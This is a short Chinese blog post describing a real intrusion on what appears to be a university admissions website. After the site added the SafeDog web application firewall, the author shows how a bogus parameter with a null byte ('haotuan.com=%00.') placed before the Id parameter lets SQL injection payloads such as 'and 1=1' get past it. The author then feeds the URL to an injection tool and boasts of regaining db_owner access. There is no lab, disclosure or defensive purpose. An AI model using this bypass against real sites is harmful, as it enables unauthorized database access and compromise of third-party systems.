有效绕过安全狗注入

一网站,入侵放了点东西,一周后发现东西不能看到了。再次尝试注入,居然用了安全狗!

有效绕过方法如下:

http://bkzs.xxx.edu.cn/Admissions_xxx/Administered/info.asp?Id=877   原网址

如果直接

http://bkzs.xxx.edu.cn/Admissions_xxx/Administered/info.asp?Id=877  and 1=1 就会被安全狗拦截:


您的请求带有不合法的参数,谢谢合作!
来自安全狗互联网安全实验室-网站安全狗软件的友好提示,了解更多请点击 www.safedog.cn

 

在注入参数“Id”的加上一个额外的参数赋值: haotuan.com=%00.  再次尝试注入,安全狗就发现不了了。

http://bkzs.xxx.edu.cn/Admissions_xxx/Administered/info.asp?haotuan.com=%00.&Id=877 and 1=1

ok

直接把http://bkzs.xxx.edu.cn/Admissions_xxx/Administered/info.asp?haotuan.com=%00.&Id=877 丢工具猜解即可。

我的db_owner,又回来了。

发表评论

电子邮件地址不会被公开。 必填项已用*标注